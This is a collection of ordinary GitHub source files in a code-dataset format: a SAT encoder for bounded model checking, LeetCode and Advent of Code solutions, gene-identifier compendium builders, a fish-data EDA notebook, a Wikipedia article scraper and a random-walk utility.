sLst_Vars: \n\t\t\t\tif lit[0]%2 == 1:\n\t\t\t\t\tclauses[clause_i][lit_i][0] = (lit[0]+1)/2 + len(ini_S)\n\t\t\t\telse:\n\t\t\t\t\tclauses[clause_i][lit_i][0] = (lit[0])/2 + currLits\t\n\t\t\telse: \n\t\t\t\tclauses[clause_i][lit_i][0] = lit[0] + newLits\n\t\tclauses.append(temp)\n\t\n\tfor k_i in range(3,K+1):\n\t\tfor clause in clauses:\n\t\t\ttemp = []\n\t\t\tfor lit in clause:\n\t\t\t\ttemp.append([lit[0] + newLits*(k_i-2) , lit[1]])\n\t\t\tFclauses.append(temp)\n\n\ttotLits = newLits*K + currLits\n\n\tindVars = [x for x in range(1,(len(ini_S)*2)+1)]\n\tindVars += [x for x in range(sLtreeN_Vars + 1, streeL_Vars + 1)]\n\n\tfor k_i in range(2,K+1):\n\t\tindVars += \t(list(range(1 + currLits + (k_i-2)*newLits , \n\t\t\t\t\t\t 1 + currLits + (k_i-2)*newLits + len(ini_S))) \\\n\t\t\t\t\t+\n\t\t\t\t\t list(range(1 + currLits + (k_i-2)*newLits + sLtreeN_Vars - len(ini_S), \n\t\t\t\t\t\t 1 + currLits + (k_i-2)*newLits + sLtreeL_Vars - len(ini_S))))\n\n\n\treturn Fclauses,totLits,indVars\n\n\n\n\n\n# \tstep_vars = sstep_expr.inputs\n# \ttot_step_vars = len(step_vars)\n# \taux_step_vars = tot_step_vars - \n\n\n\n\n\n# \ttemp_vars=0\n# \ts_temps = [[] for x in range(S)]\n# \ts_pre_temps = [[] for x in range(S)]\n# \t# print(coins)\n\n# \tfor k in range(1,K+1):\n# \t\ts_temps = [[] for x in range(S)]\n# \t\tfor s_no in range(S):\n# \t\t\tfor a_i in range(A):\t\n# \t\t\t\t# act_k_s = int_Acts[k][s_no]\n# \t\t\t\t# pmf=pmfs[s_no][act_k_s]\n# \t\t\t\tpmf=pmfs[s_no][a_i]\n# \t\t\t\tpmf_clauses,var_added,root_var,s_ts = pmf_SAT.pmf_to_SAT1(pmf,coins,temp_vars,k,s_no)\n\n# \t\t\t\t# t <==> s\n# \t\t\t\tt=root_var\n# \t\t\t\ts_lst = [[True,[0,s_no + (k-1)*S]]]\n# \t\t\t\tcurr_Act = a_i\n# \t\t\t\tfor a_x in 
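Two details in the live portion of MC_to_SAT.py above are worth pinning down. In parse_Ast, the 'const' branch as written evaluates `[1, True] [1, False]` (a list indexed by a list, a runtime TypeError); the intended tautological clause presumably needs a comma, `[[ [1, True], [1, False] ]]`. Likewise, the loop that builds the target-state literals F appends to I in its else branch, where F appears intended. Separately, the Tseitin transformation the module leans on can be exercised in isolation; a minimal sketch assuming pyeda's usual expression API:

```python
from pyeda.inter import exprvar, And, Or, Not

# a small Tseitin round-trip in the style of sstep_expr above
a, b, c = map(exprvar, "abc")
f = Or(And(a, b), Not(c))
cnf = f.tseitin()            # equisatisfiable CNF over a..c plus auxiliary vars
print(cnf.satisfy_one())     # one satisfying assignment, e.g. with c set to 0
```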
range(num_act_bits):\n# \t\t\t\t\tnext_bit = curr_Act%2\n# \t\t\t\t\tcurr_Act = curr_Act/2\n# \t\t\t\t\t# print(num_act_bits - 1 - a_x)\n# \t\t\t\t\tif(next_bit == 1):\t\n# \t\t\t\t\t\ts_lst.append([True,[3,[k-1,s_no,num_act_bits - 1 - a_x]]])\n# \t\t\t\t\telse:\n# \t\t\t\t\t\ts_lst.append([False,[3,[k-1,s_no,num_act_bits - 1 - a_x]]])\n\n# \t\t\t\t# clauses = clauses + equi_clause(s,t) + pmf_clauses\n# \t\t\t\tclauses = clauses + equi_clause_and_list(t,s_lst) + pmf_clauses\n# \t\t\t\ttemp_vars += var_added\n\n# \t\t\t\tfor s_j in range(S):\n# \t\t\t\t\ts_temps[s_j] = s_temps[s_j] + s_ts[s_j]\n\n# \t\t\t# print(s_ts)\n# \t\t# clauses += equi_clause_list([True,[0,s_no+ S*k]],[[True,[3,[s_no+ S*k,x]]] for x in range(S)])\n# \t\tfor s_no in range(S):\n# \t\t\tclauses += equi_clause_list([True,[0,s_no+ S*k]],s_temps[s_no])\n\t\t\t\n# \t\t\t# print(var_added)\n\n# \tF = [[True,[0,tgt_S + x*S]] for x in range(K+1)]\n# \tclauses.append(F)\n\n\t# f=open(out_file,\"w\")\n# \t# total_Vars = loc_temp_vars - 1\n# \ttot_StateVars = (K+1)*S\n# \ttot_act_Vars = num_act_bits*K*S\n# \ttotal_Vars = tot_StateVars + coins*K + temp_vars + tot_act_Vars\n# \ttot_s_temp_vars = (S*K*S)\n\t# f.write(\"c ind\")\n\t# for x in range(K+1):\n\t\t# for y in range(coins):\t\n\t\t\t# f.write(\" \"+str(y + x*coins + tot_StateVars + 1))\n# \t# f.write(\" 0\\n\")\n# \t# f.write(\"p cnf \"+str(total_Vars)+\" \"+str(len(clauses))+\"\\n\")\n# \t# f.write(\"c\\n\")\n\n# \t# print(tot_StateVars)\n# \t# print(coins*K)\n# \t# print(temp_vars)\n# \t# print(tot_act_Vars)\n\n# \tfor i in range(len(clauses)):\n# \t\tc = clauses[i]\n# \t\t# f.write(str(i))\n# \t\tfor lit in c:\n# \t\t\tif lit[0]==False:\n# \t\t\t\tf.write(\"-\")\n# \t\t\tif lit[1][0] == 0:\n# \t\t\t\tf.write(str(lit[1][1] + 1))\t\t\n# \t\t\tif lit[1][0] == 1:\n# \t\t\t\tf.write(str(lit[1][1] + tot_StateVars + 1))\t\t\n# \t\t\tif lit[1][0] == 2:\n# \t\t\t\tf.write(str(lit[1][1] + tot_StateVars + coins*K + 1))\t\n# \t\t\tif lit[1][0] == 3:\n# \t\t\t\tf.write(str(lit[1][1][0]*S*num_act_bits + lit[1][1][1]*num_act_bits + lit[1][1][2] + tot_StateVars + coins*K + temp_vars + 1))\t\n# \t\t\t\t# f.write(str(lit[1][1][0]) lit[1][1][1]*num_act_bits + lit[1][1][2] + tot_StateVars + coins*K + temp_vars + 1))\t\n# \t\t\t# \tf.write(str(lit[1][1][1] + S*(lit[1][1][0]-S) + tot_StateVars + coins*K + 1))\t\t\n# \t\t\tf.write(\" \")\n# \t\tf.write(\"0\\n\")\n\n# \tf.close()\n\n# \tf=open(trace_file,\"w\")\n\n# \tf.write(str(tot_StateVars) + \"\\n\")\n# \tf.write(str(coins*K) + \"\\n\")\n# \tf.write(str(temp_vars) + \"\\n\")\n# \tf.write(str(tot_act_Vars) + \"\\n\")\n\n\n# \tf.write(\"c ind\")\n# \tfor x in range(K):\n# \t\tfor y in range(coins):\t\n# \t\t\tf.write(\" \"+str(y + x*coins + tot_StateVars + 1))\n# \tf.write(\"\\n\")\n# \tf.write(\"p cnf \"+str(total_Vars)+\" \"+str(len(clauses))+\"\\n\")\n\n# \tfor i in range(len(clauses)):\n# \t\tc = clauses[i]\n# \t\t# f.write(str(i))\n# \t\tfor lit in c:\n# \t\t\tif lit[0]==False:\n# \t\t\t\tf.write(\"-\")\n# \t\t\tif lit[1][0] == 0:\n# \t\t\t\tf.write(\"s\"+str(lit[1][1]))\t\n# \t\t\tif lit[1][0] == 1:\n# \t\t\t\tf.write(\"c\"+str(lit[1][1]))\t\n# \t\t\tif lit[1][0] == 2:\n# \t\t\t\tf.write(\"t\"+str(lit[1][1]))\t\n# \t\t\tif lit[1][0] == 3:\n# \t\t\t\tf.write(\"a\"+str(lit[1][1][0])+\".\"+str(lit[1][1][1])+\".\"+str(lit[1][1][2]))\t\n# \t\t\t\t# f.write(str(lit[1][1][0]) lit[1][1][1]*num_act_bits + lit[1][1][2] + tot_StateVars + coins*K + temp_vars + 1))\t\n# \t\t\t# \tf.write(str(lit[1][1][1] + S*(lit[1][1][0]-S) + tot_StateVars + 
coins*K + 1))\t\t\n# \t\t\tf.write(\"\\t\\t\")\n# \t\tf.write(\"0\\n\")\n# \tf.close()\n\n# \treturn act_bits_list\n\n# # os.system(\"approxmc --seed 42 \"+func_argv[2])\n\n# # for c in clauses:\n# # \t\tfor lit in c:\n# # \t\t\tif not lit[0]:\n# # \t\t\t\t\tprint(\"~\",end=\"\")\n# # \t\t\telse:\n# # \t\t\t\t\tprint(\" \",end=\"\")\n# # \t\t\tif lit[1][0] == 0:\n# # \t\t\t\tprint(\"s\",end=\"\")\n# # \t\t\tif lit[1][0] == 1:\n# # \t\t\t\tprint(\"c\",end=\"\")\n# # \t\t\tif lit[1][0] == 2:\n# # \t\t\t\tprint(\"t\",end=\"\")\n# # \t\t\tprint(str(lit[1][1]),end=\"\\t\")\n# # \t\tprint(\"\")\n\t\n","repo_name":"Deep-Karkhanis/BoundedModelChecking","sub_path":"BDD_SAT/MC_to_SAT.py","file_name":"MC_to_SAT.py","file_ext":"py","file_size_in_byte":12367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39162670354","text":"from typing import List\n\n\nclass Solution:\n def intersection(self, nums1: List[int], nums2: List[int]) -> List[int]:\n d1 = dict()\n for i in nums1:\n if i not in d1:\n d1.setdefault(i, 1)\n else:\n d1[i] += 1\n ans = []\n for i in nums2:\n if i in d1 and i not in ans:\n ans.append(i)\n return ans","repo_name":"BiqiangWang/leetcode","sub_path":"DataStructure/hash_map/349.py","file_name":"349.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24510789004","text":"import math\r\nimport sys\r\nfrom timeit import default_timer as timer\r\nfrom zUtils.utils import *\r\nfrom day11_1 import Monkey, print_monkeys\r\n\r\ndata: list[str] = []\r\n\r\n# FILENAME FOR INPUT DATA\r\nINPUT_FILENAME: str = \"11.txt\"\r\n\r\n\r\ndef main():\r\n\r\n # INIT\r\n # Code for startup\r\n start_time = timer()\r\n data = advent_init(INPUT_FILENAME, sys.argv, clear_screen=True)\r\n\r\n monkeys = []\r\n for i in range(0, len(data), 7):\r\n monkeys.append(Monkey(data[i:i+6]))\r\n\r\n # HERE WE GO\r\n iterations = 10000\r\n cut = 2\r\n relief = 1\r\n\r\n # Relief needs to be the lowest common multiple of all the monkeys\r\n # That way we can keep the numbers small but they still pass all the tests\r\n relief = math.prod(list([m.test for m in monkeys]))\r\n\r\n for iteration in range(iterations):\r\n for monkey in monkeys:\r\n monkey.do(relief, True, monkeys)\r\n if (iteration+1) % 1000 == 0:\r\n clear()\r\n printDebug(f\"Round {iteration+1}\")\r\n print_monkeys(monkeys)\r\n\r\n monkeys_to_multiply = sorted(monkeys, key=lambda x: x.inspection_count)[-cut:]\r\n\r\n printGood(math.prod([i.inspection_count for i in monkeys_to_multiply]))\r\n printOK(\"Time: %.5f seconds\" % (timer()-start_time))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"ZachAttakk/adventofcode","sub_path":"2022/day11_2.py","file_name":"day11_2.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27201472272","text":"import re\n\nfrom src import babel_utils\nfrom src.prefixes import OMIM,ENSEMBL,NCBIGENE,WORMBASE, MGI, ZFIN, DICTYBASE, FLYBASE, RGD, SGD, HGNC, UMLS\nfrom src.categories import GENE\n\nimport src.datahandlers.umls as umls\n\nfrom src.babel_utils import read_identifier_file,glom,write_compendium\n\nimport os\nimport json\nimport gzip\n\nimport logging\nfrom src.util import LoggingUtil\nlogger = LoggingUtil.init_logging(__name__, level=logging.ERROR)\n\ndef write_mods_ids(dd,id,modlist):\n for mod in modlist:\n with 
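In day11_2.py above, worry levels stay bounded because each monkey's divisibility test depends only on the value modulo a common multiple of all the test divisors; math.prod of the divisors works, and the least common multiple is the tightest such modulus. A small check with hypothetical divisors (math.lcm needs Python 3.9+):

```python
import math

divisors = [23, 19, 13, 17]        # hypothetical monkey test divisors
modulus = math.lcm(*divisors)      # divides math.prod(divisors), never larger
x = 10**12 + 7
assert all((x % modulus) % d == x % d for d in divisors)
```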
open(f'{dd}/{mod}/labels','r') as inf, open(f'{id}/gene/ids/{mod}','w') as outf:\n for line in inf:\n x = line.split('\\t')[0]\n outf.write(f'{x}\\n')\n\ndef build_gene_ensembl_relationships(ensembl_dir, outfile):\n \"\"\"Loop over all the ensembl species. Find any protein-coding gene\"\"\"\n with open(outfile,'w') as outf:\n #find all the ensembl directories\n dirlisting = os.listdir(ensembl_dir)\n for dl in dirlisting:\n dlpath = os.path.join(ensembl_dir,dl)\n if os.path.isdir(dlpath):\n infname = os.path.join(dlpath,'BioMart.tsv')\n if os.path.exists(infname):\n #open each ensembl file, find the id column, and put it in the output\n with open(infname,'r') as inf:\n wrote=set()\n h = inf.readline()\n x = h[:-1].split('\\t')\n gene_column = x.index('Gene stable ID')\n column_to_prefix = { 'NCBI gene (formerly Entrezgene) ID': {NCBIGENE},\n 'ZFIN ID': {ZFIN},\n 'SGD gene name ID': {SGD},\n 'WormBase Gene ID': {WORMBASE},\n 'FlyBase ID': {FLYBASE},\n 'MGI ID': {MGI},\n 'RGD ID': {RGD}\n }\n protein_column = x.index('Protein stable ID')\n columnno_to_prefix = {}\n for i,v in enumerate(x):\n if v in column_to_prefix:\n columnno_to_prefix[i] = column_to_prefix[v]\n for line in inf:\n x = line[:-1].split('\\t')\n #Is it protein coding?\n #Protein coding is not actually relevant.\n #if x[protein_column] == '':\n # continue\n gene_id = x[gene_column]\n gid = f'{ENSEMBL}:{gene_id}'\n for cno,pref in columnno_to_prefix.items():\n value = x[cno]\n if len(value) > 0:\n outf.write(f'{gid}\\teq\\t{pref}:{value}\\n')\n\n # If the ENSEMBL ID is a version string (e.g. ENSEMBL:ENSP00000263368.3),\n # then we should indicate that this is identical to the non-versioned string\n # as well.\n # See https://github.com/TranslatorSRI/Babel/issues/72 for details.\n res = re.match(r\"^([A-Z]+\\d+)\\.\\d+\", gene_id)\n if res:\n ensembl_id_without_version = res.group(1)\n outf.write(f'{ENSEMBL}:{ensembl_id_without_version}\\teq\\t{gid}\\n')\n\ndef write_zfin_ids(infile,outfile):\n with open(infile,'r') as inf, open(outfile,'w') as outf:\n for line in inf:\n x = line.strip().split()\n if 'GENE' in x[0]:\n outf.write(f'{ZFIN}:{x[0]}')\n\ndef write_hgnc_ids(infile,outfile):\n with open(infile,'r') as inf:\n hgnc_json = json.load(inf)\n with open(outfile,'w') as outf:\n for gene in hgnc_json['response']['docs']:\n outf.write(f\"{gene['hgnc_id']}\\n\")\n\n\ndef write_omim_ids(infile,outfile):\n with open(infile,'r') as inf, open(outfile,'w') as outf:\n for line in inf:\n if line.startswith('#'):\n continue\n chunks = line.split('\\t')\n if chunks[1] == 'gene':\n outf.write(f'{OMIM}:{chunks[0]}\\n')\n\ndef write_umls_ids(mrconso, mrsty, outfile):\n \"\"\"Find the UMLS entities that are genes. This is complicated by the fact that UMLS semantic type doesn't\n have a corresponding GENE class. It has something (A1.2.3.5) which includes genes, but also includes genomes and\n variants and gene properties and gene families. We can do some filtering by looking around in the MRCONSO as well\n as the MRSTY. In particular, if the term maps to an OMIM that has a period in it, then it's a variant. Good job\n UMLS, it's not like genes are central to biology or anything.\n Also, remove anything that in the label identifies itself as an Allele or Mutation\n It's possible in the future that we'd like to try to assign better classes to some of these things.\"\"\"\n\n\n #Do I want this? 
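The version-stripping regex in build_gene_ensembl_relationships above (and again in the NCBI concordance further on) is easy to exercise on its own; a quick sketch:

```python
import re

def strip_ensembl_version(identifier: str) -> str:
    # "ENSP00000263368.3" -> "ENSP00000263368"; unversioned IDs pass through
    m = re.match(r"^([A-Z]+\d+)\.\d+", identifier)
    return m.group(1) if m else identifier

assert strip_ensembl_version("ENSP00000263368.3") == "ENSP00000263368"
assert strip_ensembl_version("ENSG00000157764") == "ENSG00000157764"
```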
There are a bunch of things under here that we probably don't want.\n blacklist=set(['C0017361', #recessive genes\n 'C0017346', #Gag viral gene family\n ])\n umls_keepers = set()\n with open(mrsty, 'r') as inf:\n for line in inf:\n x = line.strip().split('|')\n cat = x[2]\n if cat == 'A1.2.3.5':\n umls_keepers.add(x[0])\n umls_keepers.difference_update(blacklist)\n #Now filter out OMIM variants\n with open(mrconso,'r') as inf:\n for line in inf:\n x = line.strip().split('|')\n cui = x[0]\n if cui not in umls_keepers:\n continue\n lang = x[1]\n #Only keep english terms\n if lang != 'ENG':\n continue\n #only keep unsuppressed rows\n suppress = x[16]\n if suppress == 'O' or suppress == 'E':\n continue\n #only keep sources we're looking for\n source = x[11]\n if source == 'OMIM':\n value = x[13]\n if \".\" in value:\n umls_keepers.remove(x[0])\n if 'Allele' in x[14] or 'Mutation' in x[14]:\n umls_keepers.remove(x[0])\n with open(outfile,'w') as outf:\n for umls in umls_keepers:\n outf.write(f'{UMLS}:{umls}\\t{GENE}\\n')\n\ndef read_ncbi_idfile(ncbi_idfile):\n ncbi_ids = set()\n with open(ncbi_idfile,'r') as inf:\n for line in inf:\n x = line.strip().split('\\t')[0]\n ncbi_ids.add(x)\n return ncbi_ids\n\ndef build_gene_ncbi_ensembl_relationships(infile,ncbi_idfile,outfile):\n ncbi_ids = read_ncbi_idfile(ncbi_idfile)\n with gzip.open(infile,'r') as inf, open(outfile,'w') as outf:\n h = inf.readline()\n last = ('','')\n for line in inf:\n x = line.decode('utf-8').strip().split('\\t')\n ncbigene_id = f'{NCBIGENE}:{x[1]}'\n if ncbigene_id not in ncbi_ids:\n continue\n ensembl_id = f'{ENSEMBL}:{x[2]}'\n new = (ncbigene_id,ensembl_id)\n if new == last:\n continue\n outf.write(f'{ncbigene_id}\\teq\\t{ensembl_id}\\n')\n last=new\n\n # If the ENSEMBL ID is a version string (e.g. ENSEMBL:ENSP00000263368.3),\n # then we should indicate that this is identical to the non-versioned string\n # as well.\n # See https://github.com/TranslatorSRI/Babel/issues/72 for details.\n res = re.match(r\"^([A-Z]+\\d+)\\.\\d+\", x[2])\n if res:\n ensembl_id_without_version = res.group(1)\n outf.write(f'{ncbigene_id}\\teq\\t{ENSEMBL}:{ensembl_id_without_version}\\n')\n\ndef build_gene_ncbigene_xrefs(infile,ncbi_idfile,outfile):\n mappings = {'WormBase': WORMBASE, 'FLYBASE': FLYBASE, 'ZFIN': ZFIN,\n 'HGNC': HGNC, 'MGI': MGI, 'RGD': RGD, 'dictyBase': DICTYBASE,\n 'SGD': SGD }\n ncbi_ids = read_ncbi_idfile(ncbi_idfile)\n with gzip.open(infile, 'r') as inf, open(outfile, 'w') as outf:\n h = inf.readline()\n for line in inf:\n x = line.decode('utf-8').strip().split('\\t')\n ncbigene_id = f'{NCBIGENE}:{x[1]}'\n if ncbigene_id not in ncbi_ids:\n continue\n xrefs = x[5].split('|')\n for xref in xrefs:\n if xref == '-':\n continue\n xref_parts = xref.split(':')\n found_prefix=xref_parts[0]\n if found_prefix in mappings:\n outf.write(f'{ncbigene_id}\\txref\\t{mappings[found_prefix]}:{xref_parts[-1]}\\n')\n\ndef build_gene_medgen_relationships(infile,outfile):\n with open(infile, 'r') as inf, open(outfile, 'w') as outf:\n h = inf.readline()\n for line in inf:\n x = line.strip().split('\\t')\n if not x[2] == 'gene':\n continue\n ncbigene_id = f'{NCBIGENE}:{x[1]}'\n omim_id = f'{OMIM}:{x[0]}'\n outf.write(f'{ncbigene_id}\\teq\\t{omim_id}\\n')\n #It looks like this never gets invoked - these columns are only filled in for phenotypes\n if not x[4] == '-':\n umls_id = f'{UMLS}:{x[4]}'\n outf.write(f'{ncbigene_id}\\teq\\t{umls_id}\\n')\n\ndef write_ensembl_ids(ensembl_dir, outfile):\n \"\"\"Loop over all the ensembl species. 
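One robustness note on write_umls_ids above: within a single MRCONSO row, both the dotted-OMIM check and the Allele/Mutation check can fire, and the second set.remove on an already-pruned CUI raises KeyError; set.discard is the no-op-safe variant. In miniature:

```python
keepers = {"C0000001", "C0000002"}
keepers.discard("C0000001")   # removes the member
keepers.discard("C0000001")   # safe no-op; set.remove would raise KeyError here
```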
Find any protein-coding gene\"\"\"\n with open(outfile,'w') as outf:\n #find all the ensembl directories\n dirlisting = os.listdir(ensembl_dir)\n for dl in dirlisting:\n dlpath = os.path.join(ensembl_dir,dl)\n if os.path.isdir(dlpath):\n infname = os.path.join(dlpath,'BioMart.tsv')\n if os.path.exists(infname):\n #open each ensembl file, find the id column, and put it in the output\n with open(infname,'r') as inf:\n wrote=set()\n h = inf.readline()\n x = h[:-1].split('\\t')\n gene_column = x.index('Gene stable ID')\n protein_column = x.index('Protein stable ID')\n for line in inf:\n x = line[:-1].split('\\t')\n #Is it protein coding?\n #if x[protein_column] == '':\n # continue\n gid = f'{ENSEMBL}:{x[gene_column]}'\n #The gid is not unique, so don't write the same one over again\n if gid in wrote:\n continue\n wrote.add(gid)\n outf.write(f'{gid}\\n')\n\n\ndef build_gene_umls_hgnc_relationships(mrconso, umls_idfile, outfile):\n #Could also add MESH, if that were a valid gene prefix\n umls.build_sets(mrconso, umls_idfile, outfile, {'HGNC':HGNC})\n\ndef build_gene_compendia(concordances, identifiers, icrdf_filename):\n \"\"\":concordances: a list of files from which to read relationships\n :identifiers: a list of files from which to read identifiers and optional categories\"\"\"\n dicts = {}\n types = {}\n uniques = [NCBIGENE,HGNC,ENSEMBL,OMIM]\n for ifile in identifiers:\n print('loading',ifile)\n new_identifiers, new_types = read_identifier_file(ifile)\n glom(dicts, new_identifiers, unique_prefixes= uniques)\n types.update(new_types)\n for infile in concordances:\n print(infile)\n print('loading', infile)\n pairs = []\n with open(infile, 'r') as inf:\n for line in inf:\n x = line.strip().split('\\t')\n pairs.append(set([x[0], x[2]]))\n glom(dicts, pairs, unique_prefixes=uniques)\n gene_sets = set([frozenset(x) for x in dicts.values()])\n baretype = GENE.split(':')[-1]\n write_compendium(gene_sets, f'{baretype}.txt', GENE, {}, icrdf_filename=icrdf_filename)\n\n","repo_name":"TranslatorSRI/Babel","sub_path":"src/createcompendia/gene.py","file_name":"gene.py","file_ext":"py","file_size_in_byte":12328,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"74110788008","text":"class Solution:\r\n def minOperations(self, nums):\r\n inter = [0 for num in nums]\r\n nums = list(set(nums))\r\n nums.sort()\r\n i = 0\r\n j = 0\r\n min = nums[0]\r\n while i < len(nums):\r\n if nums[i] - min < len(inter):\r\n inter[j] = nums[i]\r\n del nums[i]\r\n j += 1\r\n else:\r\n i += 1\r\n return inter.count(0)\r\n\r\n\r\nif __name__ == '__main__':\r\n vals = [41,33,29,33,35,26,47,24,18,28]\r\n\r\n obj = Solution()\r\n print(obj.minOperations(vals))","repo_name":"UnStudentRoman/LeetCodeProblems","sub_path":"2009_Minimum_Number_of_Operations_to_Make_Array_Continuous.py","file_name":"2009_Minimum_Number_of_Operations_to_Make_Array_Continuous.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"143897553","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC ## Template\n# MAGIC\n# MAGIC **Objective**: This notebook's objective is to explore the dataset and set the guidelines for modeling\n# MAGIC\n# MAGIC **Takeaways**: The key takeaways of this notebook are:\n# MAGIC\n# MAGIC - No missing values;\n# MAGIC - No zero values;\n# MAGIC - The target variable is not normal, but the features are near;\n# MAGIC - The target variable has high correlation with the 
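For the make-array-continuous problem above, the customary approach sorts the de-duplicated values and slides a window of width len(nums); the answer is n minus the largest count of unique values that already fit in one window. A sketch of that O(n log n) formulation (not the repository's code):

```python
import bisect

def min_operations(nums):
    n = len(nums)
    uniq = sorted(set(nums))
    best = 0
    for i, lo in enumerate(uniq):
        # unique values already inside the target window [lo, lo + n - 1]
        j = bisect.bisect_right(uniq, lo + n - 1)
        best = max(best, j - i)
    return n - best

assert min_operations([4, 2, 5, 3]) == 0
assert min_operations([1, 2, 3, 5, 6]) == 1
```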
features;\n# MAGIC - The categorical feature maybe will be of value (But dummy variables can reduce the model performance)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### 1.0 Imports\n\n# COMMAND ----------\n\n# MAGIC %run ../01_CONFIG/utils\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### 2.0 Data Loading\n\n# COMMAND ----------\n\n#df = spark.sql(\"select * from default.fish_cleaned\").toPandas()\ndf = pd.read_csv(\"../Fish.csv\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### 3.0 Profilling\n\n# COMMAND ----------\n\ndf.head()\n\n# COMMAND ----------\n\ndisplay(df)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### 4.0 Data visualisation\n\n# COMMAND ----------\n\nsns.pairplot(data=df)\n\n# COMMAND ----------\n\nfig, axs = plt.subplots(figsize=(12, 8))\nsns.heatmap(data=df.corr(), annot=True)\nplt.show()\n\n# COMMAND ----------\n\n\n","repo_name":"micheldearaujo/artefact_mlflow_training","sub_path":"03_EDA/EDA.py","file_name":"EDA.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13523309200","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport pandas as pd\nfrom queue import Queue, Empty\nfrom concurrent.futures import ThreadPoolExecutor\nimport os\n\n\nclass Scraper:\n def __init__(self, max_num=50):\n self.max_num = max_num\n self.df = pd.DataFrame(columns=[\"text\", \"label\"])\n\n def __parse_links(self, html):\n soup = BeautifulSoup(html, 'html.parser')\n regex = re.compile(r'/wiki/.+')\n\n # Get article categories\n categories = soup.find(id=\"mw-normal-catlinks\")\n\n # Check if page contains categories (e.g. an image page does not have this information)\n if categories is None:\n return\n\n categories = categories.select('li a')\n # Continue only if articles contains the given category\n if any(self.category in cat.text.lower() for cat in categories):\n\n # Get article content\n text = ''\n for paragraph in soup.find_all('p'):\n text += paragraph.text\n\n # Drop footnote superscripts in brackets and Replace ‘\\n’ (a new line) with ‘’ (an empty string)\n text = re.sub(r'\\[.*?\\]+', '', text)\n text = text.replace('\\n', '')\n\n self.num += 1\n\n # Add article to dataframe\n self.df = self.df.append({\n \"text\": text,\n \"label\": self.category\n }, ignore_index=True)\n\n # Scrape other pages from links\n # Get all the links\n links = soup.find(id=\"bodyContent\").find_all(\"a\", {'href': True})\n\n for link in links:\n # Only interested in other wiki articles (remove external links and images)\n if re.match(regex, link.get('href')):\n self.to_crawl.put(\"https://en.wikipedia.org\" + link.get('href'))\n\n def __post_scrape_callback(self, res):\n result = res.result()\n if result and result.status_code == 200 and self.num < self.max_num:\n self.__parse_links(result.text)\n\n def __scrape_page(self, url):\n try:\n res = requests.get(url, timeout=(3, 30))\n return res\n except requests.RequestException:\n return\n\n def __run_scraper(self, base_urls, category):\n\n # Set initial values\n self.pool = ThreadPoolExecutor(max_workers=6)\n self.category = category\n self.scraped_pages = set([])\n self.to_crawl = Queue()\n # add base urls\n for url in base_urls:\n self.to_crawl.put(url)\n self.num = 0\n\n while True:\n try:\n target_url = self.to_crawl.get(timeout=60)\n # return if reached target number of articles\n if self.num > self.max_num:\n self.pool.shutdown(wait=False)\n return\n if target_url not in self.scraped_pages:\n #print(\"Scraping 
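The two-step cleanup in __parse_links above first drops bracketed footnote markers, then removes newlines; the same steps in isolation:

```python
import re

text = "Paris is the capital of France.[1][note 2]\nIt lies on the Seine.[2]"
text = re.sub(r'\[.*?\]+', '', text)   # strips [1], [note 2], [2]
text = text.replace('\n', '')
print(text)   # Paris is the capital of France.It lies on the Seine.
```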
URL: {}\".format(target_url))\n self.scraped_pages.add(target_url)\n job = self.pool.submit(self.__scrape_page, target_url)\n job.add_done_callback(self.__post_scrape_callback)\n except Empty:\n return\n except Exception as e:\n print(e)\n continue\n\n def __clean_txt(self, text):\n text = re.sub(\"'\", \"\", text)\n text = re.sub(\"(\\\\W)+\", \" \", text)\n return text\n\n def get(self):\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Sport\"], \"sport\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Economy\"], \"economy\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Engineering\"], \"engineering\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/History\"], \"history\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Philosophy\"], \"philosophy\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Politics\"], \"politics\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Religion\"], \"religion\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Food\"], \"food\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Law\"], \"law\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Culture\"], \"culture\")\n # Clean text\n self.df['text'] = self.df.text.apply(self.__clean_txt)\n self.df.to_pickle(\"data/dataframe.pkl\")\n return self.df\n\n def load(self):\n if os.path.isfile('data/dataframe.pkl'):\n return pd.read_pickle(\"data/dataframe.pkl\")\n else:\n return pd.DataFrame()\n","repo_name":"raikilon/articles-classification","sub_path":"Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3341998208","text":"import numpy as np\nfrom .traverse import BaseTraverse\n\n\nclass RandomWalk(BaseTraverse):\n def _choose_next(self):\n node_transition_probs = self.transition_probs[self._active]\n if np.isclose(np.sum(node_transition_probs), 1):\n nxt = np.random.choice(self.n_verts, p=node_transition_probs)\n return nxt\n\n\ndef to_markov_matrix(adj):\n prob_mat = adj.copy()\n row_sums = prob_mat.sum(axis=1)\n row_sums[row_sums == 0] = 1 # plug the holes\n prob_mat = prob_mat / row_sums[:, np.newaxis]\n return prob_mat\n\n\ndef random_walks_from_node(\n start_ind,\n probs,\n stop_inds=[],\n 